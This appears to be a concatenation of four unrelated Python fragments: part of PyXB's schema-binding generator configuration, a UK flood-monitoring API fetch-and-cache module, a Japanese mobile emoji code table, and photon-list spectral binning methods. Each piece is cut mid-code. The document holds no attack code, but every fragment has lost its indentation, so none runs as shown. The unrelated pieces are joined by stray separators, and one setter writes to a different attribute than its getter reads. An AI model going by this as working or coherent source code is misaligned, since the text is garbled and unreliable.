self.__schemaRoot = schema_root
return self
__schemaRoot = None
def schemaStrippedPrefix (self):
"""Optional string that is stripped from the beginning of
schemaLocation values before loading from them.
This applies only to the values of schemaLocation attributes
in C{import} and C{include} elements. Its purpose is to
convert absolute schema locations into relative ones to allow
offline processing when all schema are available in a local
directory. See C{schemaRoot}.
"""
return self.__schemaStrippedPrefix
def setSchemaStrippedPrefix (self, schema_stripped_prefix):
self.__schemaStrippedPrefix = schema_stripped_prefix
return self
__schemaStrippedPrefix = None
def locationPrefixRewriteMap (self):
"""Optional map to rewrite schema locations.
This applies only to the values of schemaLocation attributes
in C{import} and C{include} elements. Its purpose is to
convert remote or absolute schema locations into local or
relative ones to allow offline processing when all schema are
available in a local directory. See C{schemaRoot}.
"""
return self.__locationPrefixRewriteMap
def setLocationPrefixRewriteMap (self, location_prefix_rewrite_map):
self.__locationPrefixMap.clear()
self.__locationPrefixMap.update(location_prefix_rewrite_map)
return self
def addLocationPrefixRewrite (self, prefix, substituent):
"""Add a rewrite entry for schema locations.
@param prefix : A text prefix that should be removed from
schema location URIs.
@param substituent : The text prefix that should replace
C{prefix} as a prefix in a schema location URI.
"""
self.__locationPrefixRewriteMap[prefix] = substituent
return self
def argAddLocationPrefixRewrite (self, prefix_rewrite):
"""Add a rewrite entry for schema locations.
Parameter values are strings of the form C{pfx=sub}. The
effect is that a schema location that begins with C{pfx} is
rewritten so that it instead begins with C{sub}."""
try:
(prefix, substituent) = prefix_rewrite.split('=', 1)
except:
raise
self.addLocationPrefixRewrite(prefix, substituent)
__locationPrefixMap = {}
def schemaLocationList (self):
"""A list of locations from which entrypoint schemas are to be
read.
The values in the list are either URIs, or tuples consisting
of a value and a callable which, when passed the generator
object and the value, will return a
L{pyxb.xmlschema.structures.Schema} instance. See
L{addSchemaLocation}.
See also L{addSchemaLocation} and L{schemas}.
"""
return self.__schemaLocationList
def setSchemaLocationList (self, schema_location_list):
self.__schemaLocationList[:] = []
self.__schemaLocationList.extend(schema_location_list)
return self
def addSchemaLocation (self, schema_location, converter=None):
"""Add the location of an entrypoint schema.
@param schema_location: The location of the schema. This
should be a URL; if the schema location does not have a URL
scheme (e.g., C{http:}), it is assumed to be a file, and if it
is not an absolute path is located relative to the
C{schemaRoot}.
@keyword converter: Optional callable that will be invoked
with the generator instance and the schema location, and is
expected to return a L{pyxb.xmlschema.structures.Schema}
instance. If absent, the contents of the location are
converted directly.
@note: The C{converter} argument derives from WSDL support: we
need to add to the sequence of schema locations a URI of
something that will not parse as a schema, but does have inner
material that can if treated properly. "Treated properly" may
include having the archive path and other namespace
manipulations configured before anything is done to it.
"""
self.__schemaLocationList.append( (schema_location, converter) )
return self
def argAddSchemaLocation (self, schema_location):
"""Add the location of an entrypoint schema. The provided
value should be a URL; if it does not have a URL scheme (e.g.,
C{http:}), it is assumed to be a file, and if it is not an
absolute path is located relative to the C{schemaRoot}."""
self.addSchemaLocation(schema_location)
__schemaLocationList = None
def schemas (self):
"""Schema for which bindings should be generated.
These may be L{Schema<pyxb.xmlschema.structures.Schema>}
instances, or strings; the latter is preferred, and is parsed
into a Schema instance when required.
This is the list of entrypoint schemas for binding generation.
Values in L{schemaLocationList} are read and converted into
schema, then appended to this list. Values from L{moduleList}
are applied starting with the first schema in this list.
"""
return self.__schemas[:]
def setSchemas (self, schemas):
self.__schemas[:] = []
self.__schemas.extend(schemas)
return self
def addSchema (self, schema):
self.__schemas.append(schema)
return self
__schemas = None
def namespaces (self):
"""The set of L{namespaces<pyxb.namespace.Namespace>} for
which bindings will be generated.
This is the set of namespaces read from entrypoint schema,
closed under reference to namespaces defined by schema import.
@rtype: C{set}
"""
return self.__namespaces.copy()
def setNamespaces (self, namespace_set):
self.__namespaces.clear()
self.__namespaces.update(namespace_set)
return self
def addNamespace (self, namespace):
self.__namespaces.add(namespace)
return self
__namespaces = None
def moduleList (self):
"""A list of module names to be applied in order to the namespaces of entrypoint schemas"""
return self.__moduleList[:]
def _setModuleList (self, module_list):
self.__moduleList[:] = []
self.__moduleList.extend(module_list)
return self
def addModuleName (self, module_name):
"""Add a module name corresponding to an entrypoint schema.
The namespace defined by the corresponding schema will be
written to a binding using the given module name, adjusted by
L{modulePrefix}."""
self.__moduleList.append(module_name)
return self
__moduleList = None
def modulePrefix (self):
"""The prefix for binding modules.
The base name for the module holding a binding is taken from
the moduleList, moduleMap, or an XMLNS prefix associated with
the namespace in a containing schema. This value, if present,
is used as a prefix to allow a deeper module hierarchy."""
return self.__modulePrefix
def setModulePrefix (self, module_prefix):
self.__modulePrefix = module_prefix
return self
__modulePrefix = None
def namespaceModuleMap (self):
"""A map from namespace URIs to the module to be used for the
corresponding generated binding.
Module values are adjusted by L{modulePrefix} | |
'''
This module provides functionality for retrieving real-time and
latest time history level data
Reference:
https://environment.data.gov.uk/flood-monitoring/doc/reference
'''
# pylint: disable=assignment-from-no-return
import datetime
import json
import os
import warnings
import requests
import dateutil.parser
from typing import Union
try:
from .analysis import identify_potentially_bad_data
from .station import MonitoringStation, RainfallGauge
except ImportError:
from analysis import identify_potentially_bad_data
from station import MonitoringStation, RainfallGauge
def fetch(url: str) -> dict:
'''
Retrieve JSON data from a given API url.
#### Arguments
`url` (str): API url from which to fetch data
#### Returns
dict: JSON response
'''
r = requests.get(url)
data = r.json()
return data
def dump(data: dict, filename: str) -> None:
'''
Save JSON response to a file, nicely formatted.
#### Arguments
`data` (dict): JSON dict
`filename` (str): save file location
'''
f = open(filename, 'w')
data = json.dump(data, f, indent=4)
f.close()
def load(filename: str) -> dict:
'''
Loads JSON object from file.
#### Arguments
`filename` (str): JSON file to load from
#### Returns
dict: JSON dict
'''
f = open(filename, 'r')
data = json.load(f)
f.close()
return data
def fetch_stationdata(use_cache: bool = True) -> tuple[dict, dict]:
'''
Fetch data from Environment Agency for all active river level
monitoring stations at once via a REST API and return retrieved data as a
JSON object. Include tidal (coastal) stations separately.
Fetched data is dumped to a cache file so on subsequent call it can
optionally be retrieved from the cache file. This is faster than
retrieval over the internet and avoids excessive calls to the
Environment Agency service.
#### Arguments
`use_cache` (bool, default = True): whether to try fetching station data from a local cache
#### Returns
tuple[dict, dict, dict]: full JSON-formatted datasets for all river-level,
tidal and groundwater stations, respectively
'''
# URL for retrieving data for active stations with river level monitoring
ROOT_URL = "http://environment.data.gov.uk/flood-monitoring/id/stations"
API_STR = "?status=Active¶meter=level&_view=full"
RIVER_ONLY = "&type=SingleLevel"
COASTAL_ONLY = "&type=Coastal"
GROUNDWATER_ONLY = "&type=Groundwater"
url = ROOT_URL + API_STR
CACHE_DIR = 'cache/data'
try:
os.makedirs(CACHE_DIR)
except FileExistsError:
pass
river_cache_file = os.path.join(CACHE_DIR, 'station_data_river.json')
coastal_cache_file = os.path.join(CACHE_DIR, 'station_data_coastal.json')
groundwater_cache_file = os.path.join(CACHE_DIR, 'station_data_groundwater.json')
# Attempt to load all river data from file, otherwise fetch over internet
if use_cache:
try:
river_data = load(river_cache_file)
except FileNotFoundError:
river_data = fetch(url + RIVER_ONLY)
dump(river_data, river_cache_file)
try:
coastal_data = load(coastal_cache_file)
except FileNotFoundError:
coastal_data = fetch(url + COASTAL_ONLY)
dump(coastal_data, coastal_cache_file)
try:
groundwater_data = load(groundwater_cache_file)
except FileNotFoundError:
groundwater_data = fetch(url + GROUNDWATER_ONLY)
dump(groundwater_data, groundwater_cache_file)
else:
# Fetch and dump to file
river_data = fetch(url + RIVER_ONLY)
dump(river_data, river_cache_file)
coastal_data = fetch(url + COASTAL_ONLY)
dump(coastal_data, coastal_cache_file)
groundwater_data = fetch(url + GROUNDWATER_ONLY)
dump(groundwater_data, groundwater_cache_file)
return river_data, coastal_data, groundwater_data
def fetch_gauge_data(use_cache: bool = False) -> dict:
'''
Fetch data from Environment Agency for all active rainfall gauges
at once via a REST API and return retrieved data as a JSON object.
Fetched data is dumped to a cache file so on subsequent call it can
optionally be retrieved from the cache file. This is faster than
retrieval over the internet and avoids excessive calls to the
Environment Agency service.
#### Arguments
`use_cache` (bool, default = False): whether to use the most recently stored data
instead of fetching new data
#### Returns
dict: full JSON-formatted datasets for all gauges
'''
ROOT_URL = 'https://environment.data.gov.uk/flood-monitoring/id/'
API_STR = 'stations?parameter=rainfall'
url = ROOT_URL + API_STR
CACHE_DIR = 'cache/data'
try:
os.makedirs(CACHE_DIR)
except FileExistsError:
pass
cache_file = os.path.join(CACHE_DIR, 'rainfall_gauge_data.json')
# Attempt to load level data from file, otherwise fetch over internet (slower)
if use_cache:
try:
# Attempt to load from file
rainfall_data = load(cache_file)
except FileNotFoundError:
rainfall_data = fetch(url)
dump(rainfall_data, cache_file)
else:
rainfall_data = fetch(url)
dump(rainfall_data, cache_file)
return rainfall_data
def fetch_latest_water_level_data(use_cache: bool = False) -> dict:
'''
Fetch latest water levels from all measures (stations).
#### Arguments
`use_cache` (bool, default = False): whether to use the most recently stored data
instead of fetching new data
#### Returns
dict: JSON-formatted datasets of latest data at each station
'''
# URL for retrieving data
ROOT_URL = "http://environment.data.gov.uk/flood-monitoring/id/measures"
API_STR = "?parameter=level"
url = ROOT_URL + API_STR
CACHE_DIR = 'cache/data'
try:
os.makedirs(CACHE_DIR)
except FileExistsError:
pass
cache_file = os.path.join(CACHE_DIR, 'station_water_level_data.json')
# Attempt to load level data from file, otherwise fetch over internet (slower)
if use_cache:
try:
# Attempt to load from file
level_data = load(cache_file)
except FileNotFoundError:
level_data = fetch(url)
dump(level_data, cache_file)
else:
level_data = fetch(url)
dump(level_data, cache_file)
return level_data
def fetch_latest_rainfall_data(use_cache: bool = False) -> dict:
'''
Fetch latest rainfall levels from all measures (gauges).
#### Arguments
`use_cache` (bool, default = False): whether to use the most recently stored data
instead of fetching new data
#### Returns
dict: JSON-formatted datasets of latest data at each gauge
'''
# URL for retrieving data
ROOT_URL = "https://environment.data.gov.uk/flood-monitoring/id/measures"
API_STR = "?parameter=rainfall"
url = ROOT_URL + API_STR
CACHE_DIR = 'cache/data'
try:
os.makedirs(CACHE_DIR)
except FileExistsError:
pass
cache_file = os.path.join(CACHE_DIR, 'rainfall_water_level_data.json')
# Attempt to load level data from file, otherwise fetch over internet (slower)
if use_cache:
try:
# Attempt to load from file
level_data = load(cache_file)
except FileNotFoundError:
level_data = fetch(url)
dump(level_data, cache_file)
else:
level_data = fetch(url)
dump(level_data, cache_file)
return level_data
def fetch_measure_levels(station: Union[MonitoringStation, str], dt: datetime.timedelta,
**warnings_kwargs: dict) -> tuple[list[datetime.datetime], list[float]]:
'''
Fetch measure levels for one station from latest reading and going back a period dt.
If there are no measurements available within the specified period, returns ([None], [None]).
#### Arguments
`station` (Union[MonitoringStation, str]): either an input station instance or its measure_id string
`dt` (datetime.timedelta): time period for which to look back in history for data
#### Additional Kwargs and Flags
`warnings_kwargs`: passed to `floodsystem.analysis.identify_potentially_bad_data()`
#### Returns
tuple[list[datetime.datetime], list[float]]: list of dates and their recorded levels, respectively
#### Raises
`TypeError`: if the input station was not a MonitoringStation or a str
`RuntimeWarning`: if potentially bad data is detected from the station
`RuntimeWarning`: if the station has not recorded any data within the given period dt
'''
if not isinstance(station, (MonitoringStation, str)):
raise TypeError('The first argument must be either a `MonitoringStation` or a '
f'measure_id string.\nGot value {station} of type {type(station)}')
# Current time (UTC)
now = datetime.datetime.utcnow()
# Start time for data
start = now - dt
# Construct URL for fetching data
url_base = station.measure_id if isinstance(station, MonitoringStation) else station
url_options = "/readings/?_sorted&since=" + start.isoformat() + 'Z'
url = url_base + url_options
# Fetch data
data = fetch(url)
if data['items'] != []:
stationdata = fetch(data['items'][0]['@id'])
station_name = stationdata['items']['measure']['label'].split(' LVL ')[0].split(' - ')[0]
else:
warnings.warn(f'The API call to {url} returned an empty list of items (level data).'
'The station may have been down during this time period; try a larger dt. ', RuntimeWarning)
return [None], [None]
flags = {}
# Extract dates and levels
dates, levels = [], []
for measure in reversed(data['items']):
# Convert date-time string to a datetime object
d = dateutil.parser.parse(measure['dateTime'])
# Append data
dates.append(d)
levels.append(measure['value'])
flags = identify_potentially_bad_data(station_name, levels,
station_obj=station if isinstance(station, MonitoringStation) else None,
data_origin_type='RIVER_STATION', **warnings_kwargs)
for flag in flags:
warnings.warn('\n' + flag + '\n', RuntimeWarning)
return dates, levels
def fetch_rainfall_levels(gauge: Union[RainfallGauge, str], dt: datetime.timedelta,
**warnings_kwargs: dict) -> tuple[list[datetime.datetime], list[float]]:
'''
Fetch rainfall for one gauge from latest reading and going back a period dt.
If there are no measurements available within the specified period, returns ([None], [None]).
#### Arguments
`gauge` (Union[RainfallGauge, str]): either an input station instance or its measure_id string
`dt` (datetime.timedelta): time period for which to look back in history for data
#### Additional Kwargs and Flags
`warnings_kwargs`: passed to `floodsystem.analysis.identify_potentially_bad_data()`
#### Returns
tuple[list[datetime.datetime], list[float]]: list of dates and their recorded levels, respectively
#### Raises
`TypeError`: if the input gauge was not a RainfallGauge or a str
`RuntimeWarning`: if potentially bad data is detected from the gauge
`RuntimeWarning`: if the gauge has not recorded any data within the given period dt
'''
if not isinstance(gauge, (RainfallGauge, str)):
raise TypeError('The first argument must be either a `RainfallGauge` or a '
f'measure_id string.\nGot value {gauge} of type {type(gauge)}')
# Current time (UTC)
now = datetime.datetime.utcnow()
# Start time for data
start = now - dt
# Construct URL for fetching data
url_base = gauge.measure_id if isinstance(gauge, RainfallGauge) else gauge
url_options = "/readings?_sorted&since=" | |
"F741",
"unicode" : "E525",
"jis-email" : "7722",
"sjis-email" : "EC41",
"utf-8" : "EF8181"
},
"184" : {
"number" : "184",
"name" : "5square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff15",
"sjis" : "F742",
"unicode" : "E526",
"jis-email" : "7723",
"sjis-email" : "EC42",
"utf-8" : "EF8182"
},
"185" : {
"number" : "185",
"name" : "6square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff16",
"sjis" : "F743",
"unicode" : "E527",
"jis-email" : "7724",
"sjis-email" : "EC43",
"utf-8" : "EF8183"
},
"186" : {
"number" : "186",
"name" : "7square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff17",
"sjis" : "F744",
"unicode" : "E528",
"jis-email" : "7725",
"sjis-email" : "EC44",
"utf-8" : "EF8184"
},
"187" : {
"number" : "187",
"name" : "8square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff18",
"sjis" : "F745",
"unicode" : "E529",
"jis-email" : "7726",
"sjis-email" : "EC45",
"utf-8" : "EF8185"
},
"188" : {
"number" : "188",
"name" : "9square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff19",
"sjis" : "F746",
"unicode" : "E52A",
"jis-email" : "7727",
"sjis-email" : "EC46",
"utf-8" : "EF8186"
},
"189" : {
"number" : "189",
"name" : "10square",
"title" : u"\u56db\u89d2\u6570\u5b5710",
"sjis" : "F747",
"unicode" : "E52B",
"jis-email" : "7728",
"sjis-email" : "EC47",
"utf-8" : "EF8187"
},
"190" : {
"number" : "190",
"name" : "typhoon",
"title" : u"\u53f0\u98a8",
"sjis" : "F641",
"unicode" : "E469",
"jis-email" : "7522",
"sjis-email" : "EB41",
"utf-8" : "EEBD81"
},
"191" : {
"number" : "191",
"name" : "snowman",
"title" : u"\u3086\u304d\u3060\u308b\u307e",
"sjis" : "F65D",
"unicode" : "E485",
"jis-email" : "753E",
"sjis-email" : "EB5D",
"utf-8" : "EEBD9D"
},
"192" : {
"number" : "192",
"name" : "aries",
"title" : u"\u661f\u5ea7(\u304a\u3072\u3064\u3058\u5ea7)",
"sjis" : "F667",
"unicode" : "E48F",
"jis-email" : "7548",
"sjis-email" : "EB67",
"utf-8" : "EEBDA7"
},
"193" : {
"number" : "193",
"name" : "taurus",
"title" : u"\u661f\u5ea7(\u304a\u3046\u3057\u5ea7)",
"sjis" : "F668",
"unicode" : "E490",
"jis-email" : "7549",
"sjis-email" : "EB68",
"utf-8" : "EEBDA8"
},
"194" : {
"number" : "194",
"name" : "gemini",
"title" : u"\u661f\u5ea7(\u53cc\u5b50\u5ea7)",
"sjis" : "F669",
"unicode" : "E491",
"jis-email" : "754A",
"sjis-email" : "EB69",
"utf-8" : "EEBDA9"
},
"195" : {
"number" : "195",
"name" : "cancer",
"title" : u"\u661f\u5ea7(\u304b\u306b\u5ea7)",
"sjis" : "F66A",
"unicode" : "E492",
"jis-email" : "754B",
"sjis-email" : "EB6A",
"utf-8" : "EEBDAA"
},
"196" : {
"number" : "196",
"name" : "leo",
"title" : u"\u661f\u5ea7(\u3057\u3057\u5ea7)",
"sjis" : "F66B",
"unicode" : "E493",
"jis-email" : "754C",
"sjis-email" : "EB6B",
"utf-8" : "EEBDAB"
},
"197" : {
"number" : "197",
"name" : "virgo",
"title" : u"\u661f\u5ea7(\u304a\u3068\u3081\u5ea7)",
"sjis" : "F66C",
"unicode" : "E494",
"jis-email" : "754D",
"sjis-email" : "EB6C",
"utf-8" : "EEBDAC"
},
"198" : {
"number" : "198",
"name" : "libra",
"title" : u"\u661f\u5ea7(\u5929\u79e4\u5ea7)",
"sjis" : "F66D",
"unicode" : "E495",
"jis-email" : "754E",
"sjis-email" : "EB6D",
"utf-8" : "EEBDAD"
},
"199" : {
"number" : "199",
"name" : "scorpio",
"title" : u"\u661f\u5ea7(\u3055\u305d\u308a\u5ea7)",
"sjis" : "F66E",
"unicode" : "E496",
"jis-email" : "754F",
"sjis-email" : "EB6E",
"utf-8" : "EEBDAE"
},
"200" : {
"number" : "200",
"name" : "sagittarius",
"title" : u"\u661f\u5ea7(\u3044\u3066\u5ea7)",
"sjis" : "F66F",
"unicode" : "E497",
"jis-email" : "7550",
"sjis-email" : "EB6F",
"utf-8" : "EEBDAF"
},
"201" : {
"number" : "201",
"name" : "capricorn",
"title" : u"\u661f\u5ea7(\u3084\u304e\u5ea7)",
"sjis" : "F670",
"unicode" : "E498",
"jis-email" : "7551",
"sjis-email" : "EB70",
"utf-8" : "EEBDB0"
},
"202" : {
"number" : "202",
"name" : "aquarius",
"title" : u"\u661f\u5ea7(\u6c34\u74f6\u5ea7)",
"sjis" : "F671",
"unicode" : "E499",
"jis-email" : "7552",
"sjis-email" : "EB71",
"utf-8" : "EEBDB1"
},
"203" : {
"number" : "203",
"name" : "pisces",
"title" : u"\u661f\u5ea7(\u3046\u304a\u5ea7)",
"sjis" : "F672",
"unicode" : "E49A",
"jis-email" : "7553",
"sjis-email" : "EB72",
"utf-8" : "EEBDB2"
},
"204" : {
"number" : "204",
"name" : "ophiuchus",
"title" : u"\u661f\u5ea7(\u3078\u3073\u3064\u304b\u3044\u5ea7)",
"sjis" : "F673",
"unicode" : "E49B",
"jis-email" : "7554",
"sjis-email" : "EB73",
"utf-8" : "EEBDB3"
},
"205" : {
"number" : "205",
"name" : "atm",
"title" : u"\uff21\uff34\uff2d",
"sjis" : "F67B",
"unicode" : "E4A3",
"jis-email" : "755C",
"sjis-email" : "EB7B",
"utf-8" : "EEBDBB"
},
"206" : {
"number" : "206",
"name" : "24hours",
"title" : u"24HOURS(\u30b3\u30f3\u30d3\u30cb)",
"sjis" : "F67C",
"unicode" : "E4A4",
"jis-email" : "755D",
"sjis-email" : "EB7C",
"utf-8" : "EEBDBC"
},
"207" : {
"number" : "207",
"name" : "toilet",
"title" : u"\u30c8\u30a4\u30ec",
"sjis" : "F67D",
"unicode" : "E4A5",
"jis-email" : "755E",
"sjis-email" : "EB7D",
"utf-8" : "EEBDBD"
},
"208" : {
"number" : "208",
"name" : "parking",
"title" : u"\u30d1\u30fc\u30ad\u30f3\u30b0",
"sjis" : "F67E",
"unicode" : "E4A6",
"jis-email" : "755F",
"sjis-email" : "EB7E",
"utf-8" : "EEBDBE"
},
"209" : {
"number" : "209",
"name" : "busstop",
"title" : u"\u30d0\u30b9\u505c",
"sjis" : "F680",
"unicode" : "E4A7",
"jis-email" : "7560",
"sjis-email" : "EB80",
"utf-8" : "EEBE80"
},
"210" : {
"number" : "210",
"name" : "antenna",
"title" : u"\u30a2\u30f3\u30c6\u30ca(\u4f4d\u7f6e\u60c5\u5831\u30de\u30fc\u30af)",
"sjis" : "F681",
"unicode" : "E4A8",
"jis-email" : "7561",
"sjis-email" : "EB81",
"utf-8" : "EEBE81"
},
"211" : {
"number" : "211",
"name" : "harbor",
"title" : u"\u6e2f(\u3044\u304b\u308a\u30de\u30fc\u30af)",
"sjis" : "F682",
"unicode" : "E4A9",
"jis-email" : "7562",
"sjis-email" : "EB82",
"utf-8" : "EEBE82"
},
"212" : {
"number" : "212",
"name" : "bank",
"title" : u"\u9280\u884c",
"sjis" : "F683",
"unicode" : "E4AA",
"jis-email" : "7563",
"sjis-email" : "EB83",
"utf-8" : "EEBE83"
},
"213" : {
"number" : "213",
"name" : "gasstation",
"title" : u"\u30ac\u30b9\u30b9\u30bf\u30f3\u30c9",
"sjis" : "F78E",
"unicode" : "E571",
"jis-email" : "776E",
"sjis-email" : "EC8E",
"utf-8" : "EF828E"
},
"214" : {
"number" : "214",
"name" : "map",
"title" : u"\u5730\u56f3",
"sjis" : "F78F",
"unicode" : "E572",
"jis-email" : "776F",
"sjis-email" : "EC8F",
"utf-8" : "EF828F"
},
"215" : {
"number" : "215",
"name" : "bicycle",
"title" : u"\u81ea\u8ee2\u8eca",
"sjis" : "F687",
"unicode" : "E4AE",
"jis-email" : "7567",
"sjis-email" : "EB87",
"utf-8" : "EEBE87"
},
"216" : {
"number" : "216",
"name" : "bus",
"title" : u"\u30d0\u30b9",
"sjis" : "F688",
"unicode" : "E4AF",
"jis-email" : "7568",
"sjis-email" : "EB88",
"utf-8" : "EEBE88"
},
"217" : {
"number" : "217",
"name" : "superexpress",
"title" : u"\u65b0\u5e79\u7dda",
"sjis" : "F689",
"unicode" : "E4B0",
"jis-email" : "7569",
"sjis-email" : "EB89",
"utf-8" : "EEBE89"
},
"218" : {
"number" : "218",
"name" : "marathon",
"title" : u"\u30de\u30e9\u30bd\u30f3",
"sjis" : "F643",
"unicode" : "E46B",
"jis-email" : "7524",
"sjis-email" : "EB43",
"utf-8" : "EEBD83"
},
"219" : {
"number" : "219",
"name" : "soccer",
"title" : u"\u30b5\u30c3\u30ab\u30fc",
"sjis" : "F68F",
"unicode" : "E4B6",
"jis-email" : "756F",
"sjis-email" : "EB8F",
"utf-8" : "EEBE8F"
},
"220" : {
"number" : "220",
"name" : "tennis",
"title" : u"\u30c6\u30cb\u30b9",
"sjis" : "F690",
"unicode" : "E4B7",
"jis-email" : "7570",
"sjis-email" : "EB90",
"utf-8" : "EEBE90"
},
"221" : {
"number" : "221",
"name" : "snowboard",
"title" : u"\u30b9\u30ce\u30fc\u30dc\u30fc\u30c9",
"sjis" : "F691",
"unicode" : "E4B8",
"jis-email" : "7571",
"sjis-email" : "EB91",
"utf-8" : "EEBE91"
},
"222" : {
"number" : "222",
"name" : "checkerflag",
"title" : u"\u30c1\u30a7\u30c3\u30ab\u30fc\u30d5\u30e9\u30b0(\u30e2\u30fc\u30bf\u30fc\u30b9\u30dd\u30fc\u30c4)",
"sjis" : "F692",
"unicode" : "E4B9",
"jis-email" : "7572",
"sjis-email" : "EB92",
"utf-8" : "EEBE92"
},
"223" : {
"number" : "223",
"name" : "amusementpark",
"title" : u"\u904a\u5712\u5730",
"sjis" : "F645",
"unicode" : "E46D",
"jis-email" : "7526",
"sjis-email" : "EB45",
"utf-8" : "EEBD85"
},
"224" : {
"number" : "224",
"name" : "hotspring",
"title" : u"\u6e29\u6cc9",
"sjis" : "F695",
"unicode" : "E4BC",
"jis-email" : "7575",
"sjis-email" : "EB95",
"utf-8" : "EEBE95"
},
"225" : {
"number" : "225",
"name" : "bistro",
"title" : u"\u5c45\u9152\u5c4b(\u8d64\u3061\u3087\u3046\u3061\u3093)",
"sjis" : "F696",
"unicode" : "E4BD",
"jis-email" : "7576",
"sjis-email" : "EB96",
"utf-8" : "EEBE96"
},
"226" : {
"number" : "226",
"name" : "movie",
"title" : u"\u6620\u753b(\u304b\u3061\u3093\u3053)",
"sjis" : "F697",
"unicode" : "E4BE",
"jis-email" : "7577",
"sjis-email" : "EB97",
"utf-8" : "EEBE97"
},
"227" : {
"number" : "227",
"name" : "nightbridge",
"title" : u"\u591c\u306e\u6a4b",
"sjis" : "F698",
"unicode" : "E4BF",
"jis-email" : "7578",
"sjis-email" : "EB98",
"utf-8" : "EEBE98"
},
"228" : {
"number" : "228",
"name" : "tower",
"title" : u"\u6771\u4eac\u30bf\u30ef\u30fc",
"sjis" : "F699",
"unicode" : "E4C0",
"jis-email" : "7579",
"sjis-email" : "EB99",
"utf-8" : "EEBE99"
},
"229" : {
"number" : "229",
| |
bin_edges
widths_full = w1 - w0 # full bin wdiths
t = _np.zeros(len(w0), 'f8')
for tranges, wranges in zip(self.obs_times, self.obs_bandpasses):
tranges = _np.copy(tranges)
if time_ranges is not None:
tranges = utils.rangeset_intersect(time_ranges, tranges, presorted=True)
if len(tranges) == 0:
continue
# total exposure time for observation
dt = _np.sum(tranges[:,1] - tranges[:,0])
# avoid double-counting of overlapping orders. (user must call merge_orders t use multiple orders)
if len(wranges) > 1:
isort = _np.argsort(wranges[:,0])
wranges = wranges[isort,:]
wranges = reduce(utils.rangeset_union, wranges[1:], wranges[:1])
for wr in wranges:
# shift left edges of bins left of wr to wr[0], same for right edges right of wr[1]
# use copies to avoid modfying input bin_edges
_w0, _w1 = w0.copy(), w1.copy()
_w0[w0 < wr[0]] = wr[0]
_w1[w1 > wr[1]] = wr[1]
# recompute bin widths, now those fully outside of wr will have negative value, so set them to 0.0
widths_partial = _w1 - _w0
widths_partial[widths_partial < 0] = 0.0
# compute and add exposure times, using fractional of bin width after adjusting to wr vs original bin
# widths. this will cause bins outside of wr to get 0 exposure time, those inside to get full exposure
# time, and partial bins to get partial exposure time
fractions = widths_partial / widths_full
t += fractions*dt
return t
def clean_obs_times(self, bandpasses=None):
# stack and sort all of the time ranges
if bandpasses is None:
obs_times_lst = self.obs_times
else:
covered = self.check_wavelength_coverage(bandpasses)
covered = _np.all(covered, 0)
if not _np.any(covered):
raise ValueError('No observations cover the provided bandpasses.')
obs_times_lst = [self.obs_times[i] for i in _np.nonzero(covered)[0]]
obs_times = _np.vstack(obs_times_lst)
isort = _np.argsort(obs_times[:,0])
obs_times = obs_times[isort, :]
# loop through dealing with overlap when it occurs
clean_times = [obs_times[0]]
for rng in obs_times[1:]:
last = clean_times[-1][-1]
# if rng overlaps with the end of the last range
if rng[0] < last:
# extend the the last range if rng extends beyond its end, otherwise rng is completely overlapped and
# can be discarded
if rng[-1] > last:
clean_times[-1][-1] = rng[-1]
else:
clean_times.append(rng)
return _np.vstack(clean_times)
def abstime(self, t):
if hasattr(t, 'unit'):
t = t.to(_u.s)
else:
t = t * self['t'].unit
t = t.to(_u.s)
t = _time.TimeDelta(t.value, format='sec')
return self.time_datum + t
#endregion
#region HIDDEN METHODS
def _get_proper_key(self, key):
"""
Parameters
----------
key
Returns
-------
"""
if key in self.photons.colnames:
return key
key = key.lower()
if key in self._alternate_names.values():
return key
elif key in self._alternate_names:
return self._alternate_names[key]
else:
raise KeyError('{} not recognized as a field name'.format(key))
def _get_ribbon_edges(self, ysignal, yback):
"""
Parameters
----------
ysignal
yback
Returns
-------
edges, isignal, iback, area_ratio
"""
# join ranges into one list
ys = list(ysignal) + list(yback)
#check for bad input
ys = sorted(ys, key=lambda a: a[0])
ys = _np.array(ys)
if any(ys[:-1, 1] > ys[1:, 0]):
raise ValueError('There is overlap in the signal and background regions. That\'s a no-no.')
# discard duplicate values (i.e. where a signal and background region share an edge)
edges = _np.unique(ys)
ymax = self['y'].max()
ymin = self['y'].min()
if ymax < edges.max() or ymin > edges.min():
raise ValueError('Extraction ribbons include areas beyond the range of the counts.')
# find where signal band is in sorted edges
ysignal_mids = (ysignal[:,0] + ysignal[:,1])/2.0
isignal = _np.searchsorted(edges, ysignal_mids)
if yback is not None:
# find area ratio of signal to background
area_signal = _np.sum(_np.diff(ysignal, axis=1))
area_back = _np.sum(_np.diff(yback, axis=1))
area_ratio = float(area_signal)/area_back
# find where background bands are in the sorted edges
yback_mids = (yback[:,0] + yback[:,1]) / 2.0
iback = _np.searchsorted(edges, yback_mids)
else:
iback, area_ratio = None, None
return edges, isignal, iback, area_ratio
def _compute_epera(self, units='erg'):
"""
Computes energy per effective area, applying weights (if available). No distinction is made between
background and signal counts.
Returns
-------
epera
"""
if 'a' not in self:
raise ValueError('Photons must have effective area data to permit the computation of fluxes.')
energy = _const.h * _const.c / self['w']
energy = energy.to(units).value
epera = energy / self['a']
return epera
def _full_weights(self, fluxed=False, energy_units='erg'):
"""
Parameters
----------
fluxed
energy_units
Returns
-------
weights
"""
weights = _np.ones(len(self), 'f8')
if 'e' in self:
weights *= self['e']
if 'r' in self:
weights *= self['r']
if fluxed:
weights *= self._compute_epera(units=energy_units)
return weights
def _groom_wbins(self, wbins, wranges=None, bin_method='elastic'):
"""
Parameters
----------
wbins
wranges
Returns
-------
wbins
"""
if wranges is None:
wranges = _np.vstack(self.obs_bandpasses)
wranges = [wranges.min(), wranges.max()]
if hasattr(wranges[0], '__iter__'):
bin_groups, igaps = [], [0]
for wrange in wranges:
_wbins = _groom_bins(wbins, wrange, bin_method)
igaps.append(igaps[-1] + len(_wbins))
bin_groups.append(_wbins)
igaps = _np.array(igaps[1:-1]) - 1
return _np.hstack(bin_groups), igaps
return _groom_bins(wbins, wranges, bin_method=bin_method), None
def _groom_ybins(self, ybins):
rng = [self['y'].min(), self['y'].max()]
return _groom_bins(ybins, rng, bin_method='partial')
def _construct_time_bins(self, time_step, bin_method, time_range=None, bandpasses=None):
if time_range is None:
obs_times = _np.vstack(self.obs_times)
time_range = [obs_times.min(), obs_times.max()]
# check for valid input
validspecs = ['elastic', 'full', 'partial']
if bin_method not in validspecs:
